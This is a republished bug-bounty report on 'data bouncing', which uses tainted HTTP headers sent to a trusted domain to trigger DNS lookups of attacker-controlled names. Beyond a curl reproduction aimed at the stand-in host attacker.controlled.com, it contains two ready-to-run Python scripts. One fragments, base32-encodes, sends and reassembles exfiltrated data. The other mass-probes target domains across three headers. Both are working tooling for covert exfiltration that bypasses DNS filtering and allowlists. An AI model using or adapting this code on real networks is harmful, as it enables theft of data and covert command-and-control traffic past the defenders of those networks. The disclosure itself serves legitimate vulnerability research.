Bouncing Through CloudSpike
*CloudSpike may be a pseudonym
Here is the conversation with the highly reputable CloudSpike via the hackeroony submission page. The difficulty with data bouncing is that its value lies in inheriting a domain's trust to transport exfiltrated data, and the less informed struggle with it because they focus on the lack of infrastructure (of their own infrastructure, or of control over it, and in turn of any recourse), which is a reflection of their understanding. Anything marked as informational on a security triage platform is fair game for public consumption.
Summary:
There exists a method, which we have termed 'Data-Bouncing', that allows data to be transmitted through infrastructure such as yours by combining crafted web requests with DNS A record lookups.
The process involves sending web requests to your domains with various headers set to domains under an attacker's control. So far in our research we have noted that the following headers are susceptible to this type of attack:
- Host
- Referer
- X-Forwarded-For
For certain requests this causes your infrastructure to issue a DNS query for the attacker-controlled domain, which enables DNS exfiltration via your domain and the further attack strategies noted in this document.
Overview of stages involved
- From the targeted network an outbound DNS request would be seen for r2d2.cloudspike.com
- An HTTP request would be seen exiting the network to r2d2.cloudspike.com
- The normal path would be for the request to reach the origin server
- A DNS request is made for the domain named in the Host header, whose authoritative DNS server is controlled by the attacker
- Data can be fragmented, sent via this route and reassembled on the attacker's host
Note 1: The targeted network would not be aware of the intended destination of the data: the only name it resolves is r2d2.cloudspike.com and the traffic leaving it looks legitimate, because the lookup of the attacker's domain is issued from CloudSpike's side (origin or CDN), not from the victim. An egress proxy that logs the Host header separately from the connection target could still spot the mismatch.
Note 2: Depending on how the CDN is working, the origin server may not see the HTTP requests, as they may have been handled by the CDN appliance.
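The fragmentation and reassembly stage is easiest to see in code. The script below is an added example, not code from the original report. It assumes the report's r2d2.cloudspike.com bounce target and the attacker.controlled.com zone, and the DNS log lines it reassembles from are constructed inline to stand in for the attacker's authoritative server log (with a duplicate, mixed case and an unrelated query, as a real log would have).

```python
import base64
import random
import re
import urllib.request

BOUNCE_HOST = "r2d2.cloudspike.com"        # the bounce target named in the report
ATTACKER_ZONE = "attacker.controlled.com"   # assumed attacker-authoritative zone
SUFFIX = f"{BOUNCE_HOST}.{ATTACKER_ZONE}"
MAX_LABEL = 63   # RFC 1035 label limit
MAX_NAME = 253   # practical limit for a full name without the trailing dot


def fragment(payload: bytes, session: str, chunk_labels: int = 2) -> list[str]:
    """Split payload into Host header values of the form
    <data>[.<data>].s<seq>-<total>.<session>.r2d2.cloudspike.com.attacker.controlled.com
    Base32 is used because DNS names are case-insensitive (base64 would be corrupted).
    `session` must be a lowercase label so it survives 0x20 case mixing."""
    b32 = base64.b32encode(payload).decode().rstrip("=").lower()
    per_host = MAX_LABEL * chunk_labels
    pieces = [b32[i:i + per_host] for i in range(0, len(b32), per_host)]
    hosts = []
    for seq, piece in enumerate(pieces):
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        host = ".".join(labels + [f"s{seq}-{len(pieces)}", session, SUFFIX])
        if len(host) > MAX_NAME:
            raise ValueError("name too long; lower chunk_labels")
        hosts.append(host)
    return hosts


def bounce(hosts, url=f"http://{BOUNCE_HOST}/", timeout=5):
    """Send one ordinary-looking request per fragment with only the Host header tainted.
    The HTTP response is irrelevant: the lookup happens on the far side."""
    for host in hosts:
        req = urllib.request.Request(url, headers={"Host": host})
        try:
            urllib.request.urlopen(req, timeout=timeout).close()
        except Exception:
            pass


QUERY_RE = re.compile(r"query: (?P<qname>\S+) IN A\b")


def simulated_log(hosts):
    """Constructed BIND-style query log lines standing in for the attacker's real
    server log: out of order, one duplicate (resolver retry, upper case, trailing dot)
    and an unrelated query that must be ignored."""
    lines = [f"client 198.51.100.7#5353: query: {h} IN A +" for h in hosts]
    lines.append(f"client 198.51.100.7#5353: query: {hosts[0].upper()}. IN A +")
    lines.append("client 203.0.113.9#4444: query: www.attacker.controlled.com IN A +")
    random.Random(1).shuffle(lines)
    return lines


def reassemble(log_lines, session: str) -> bytes:
    """Rebuild the payload from the query log; raises if any fragment never arrived."""
    pat = re.compile(
        r"^(?P<data>(?:[a-z2-7]{1,63}\.)+)s(?P<seq>\d+)-(?P<total>\d+)\."
        + re.escape(session) + r"\." + re.escape(SUFFIX) + r"\.?$")
    chunks, total = {}, None
    for line in log_lines:
        m = QUERY_RE.search(line)
        q = pat.match(m.group("qname").lower()) if m else None
        if not q:
            continue
        total = int(q.group("total"))
        chunks[int(q.group("seq"))] = q.group("data").replace(".", "")
    if total is None or len(chunks) != total:
        missing = sorted(set(range(total or 0)) - set(chunks))
        raise ValueError(f"incomplete transfer, missing fragments {missing}")
    b32 = "".join(chunks[i] for i in range(total)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


if __name__ == "__main__":
    hosts = fragment(b"A" * 80, "ab12", chunk_labels=1)
    # bounce(hosts)  # uncomment to actually send; then feed the zone's query log below
    print(reassemble(simulated_log(hosts), "ab12"))
```

Each fragment travels in a request to http://r2d2.cloudspike.com/ whose Host header is one of the names `fragment` returns; the sequence and total labels let the receiver detect loss, since nothing on the bounce path retransmits a lookup that a resolver dropped.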
Steps To Reproduce:
As an example, if we make an HTTP GET request to r2d2.cloudspike.com and change the Host header to r2d2.cloudspike.com.attacker.controlled.com, a DNS query for r2d2.cloudspike.com.attacker.controlled.com can be seen at the authoritative DNS server for attacker.controlled.com.
- Identify header tainting opportunities:
Example using curl:
curl --request GET \
  --url http://r2d2.cloudspike.com/ \
  --header 'Host: r2d2.cloudspike.com.attacker.controlled.com'
- Observe DNS requests at attacker.controlled.com:
By viewing the DNS request logs at attacker.controlled.com you should see a query for r2d2.cloudspike.com.attacker.controlled.com.
- Proof of concept:
This step is optional. Reach out if you'd like us to demonstrate this for you. We also have prebuilt scripts available to search a list of domains en masse.
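The steps above can be run as one procedure. The script below is an added example, not the report's prebuilt scripts, and it generalises the curl request to all three headers named in the summary rather than Host alone. It assumes attacker.controlled.com is a zone whose authoritative server logs queries, as in the report; the target list and the log lines it correlates against are constructed for an offline run. Each probe gets its own canary name (header name plus a random token in front of the report's target.zone form), so the log shows which header leaked and a lookup cached from an earlier run cannot mask a fresh result.

```python
import re
import secrets
import urllib.request

ATTACKER_ZONE = "attacker.controlled.com"          # assumed attacker-authoritative zone
HEADERS = ("Host", "Referer", "X-Forwarded-For")   # the headers the report lists


def build_probes(targets, zone=ATTACKER_ZONE, token=None):
    """One canary name per (target, header) pair:
    <header>.<token>.<target>.<zone>, e.g. host.deadbeef.r2d2.cloudspike.com.attacker.controlled.com"""
    token = token or secrets.token_hex(4)
    probes = []
    for target in targets:
        for header in HEADERS:
            canary = f"{header.lower().replace('-', '')}.{token}.{target}.{zone}"
            # Referer is a URL; the other two headers carry the bare name
            value = f"http://{canary}/" if header == "Referer" else canary
            probes.append({"target": target, "header": header, "canary": canary,
                           "request_headers": {header: value}})
    return probes


def send_probes(probes, timeout=5):
    """Request each target normally, with only the probed header tainted."""
    for p in probes:
        req = urllib.request.Request(f"http://{p['target']}/", headers=p["request_headers"])
        try:
            urllib.request.urlopen(req, timeout=timeout).close()
        except Exception:
            pass   # status codes and errors are irrelevant; only the DNS log matters


QUERY_RE = re.compile(r"query: (?P<qname>\S+) IN A\b")


def correlate(probes, log_lines):
    """Map attacker-side DNS query log lines back to the (target, header) pairs that leaked."""
    by_canary = {p["canary"]: p for p in probes}
    leaked = set()
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        # resolvers may 0x20-mix the case or log a trailing dot; normalise before matching
        qname = m.group("qname").lower().rstrip(".")
        p = by_canary.get(qname)
        if p:
            leaked.add((p["target"], p["header"]))
    return sorted(leaked)


# Constructed log lines for an offline run; real lines come from the zone's query log
SAMPLE_LOG = [
    "client 198.51.100.7#5353: query: Host.deadbeef.r2d2.cloudspike.com.attacker.controlled.com. IN A +",
    "client 198.51.100.7#5353: query: xforwardedfor.deadbeef.example.net.attacker.controlled.com IN A +",
    "client 203.0.113.9#4444: query: www.attacker.controlled.com IN A +",
]

if __name__ == "__main__":
    probes = build_probes(["r2d2.cloudspike.com", "example.net"], token="deadbeef")
    # send_probes(probes)  # uncomment to actually bounce, then pull the zone's query log
    for target, header in correlate(probes, SAMPLE_LOG):
        print(f"{target}: the {header} header triggers a lookup")
```

Run against a real domain list, the output is the per-header tainting map the report's "identify header tainting opportunities" step asks for; a target that appears for none of the three headers simply did not resolve any of its canaries within the collection window.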
Impact
This issue's assessment diverges from the conventional CVSS framework and requires a nuanced approach. We offer the following considerations:
Value to Threat Actors
- Data Exfiltration via Trusted Domains: Threat actors can transmit data outside of a network using domains that are perceived as trustworthy, making detection more challenging.
- Circumventing Security Controls: Utilising these techniques, attackers can bypass security measures such as DNS filtering and domain allowlists.
- Fragmented Data Sending: With a broad range of domains at their disposal, malicious actors can split the data across many domains, further evading detection.
- Eliminating Warm-up Needs and Domain Fronting: The methods remove the need for attackers to prepare domains for their infrastructure or to use techniques like domain fronting.
Legal Risks
- Regulatory Penalties: Depending on jurisdiction and data type, severe fines may be levied, such as up to 4% of annual global turnover under the GDPR in the EU.
- Reputational Damage: Legal actions can result in negative publicity, potentially harming long-term brand trust.
- Sanctions Violations: Unauthorized data transfers to/from entities in sanctioned regions or to sanctioned entities can attract heavy penalties. For instance, the U.S. has extensive sanctions programs governed by OFAC.
- Legal Scrutiny and Audits: Unauthorized data transfers breaching sanctions can subject an organization to increased regulatory oversight and potential comprehensive business audits.
- Restricted Business Operations: Sanction violations can curtail an entity's business operations in certain areas or with certain parties.
Operational Risks
- Downtime: Unauthorised data transfers may necessitate system shutdowns, causing business interruptions. Moreover, addressing the aftermath can strain both internal and external IT and security resources.
- Loss of Business: Trust issues may lead to severed ties with customers or partners.
- Increased Costs: Remediation, reputation management, enhanced security, and potential fines or settlements can escalate expenses.
- Loss of Partnerships: Affiliates might distance themselves from sanction-violating organizations to prevent association or implication.
Technical Risks
- Malware Facilitation: This method can carry malware, covert communications, C2 traffic and unauthorised data transfers, capitalising on the trust placed in the domain.
- Increased Monitoring: Sanction breaches might result in heightened digital communications and data transfer scrutiny, adding technical overhead.
- Infrastructure Limitations: Compliance might require infrastructure restrictions like geo-blocking or access limitation to certain IP ranges.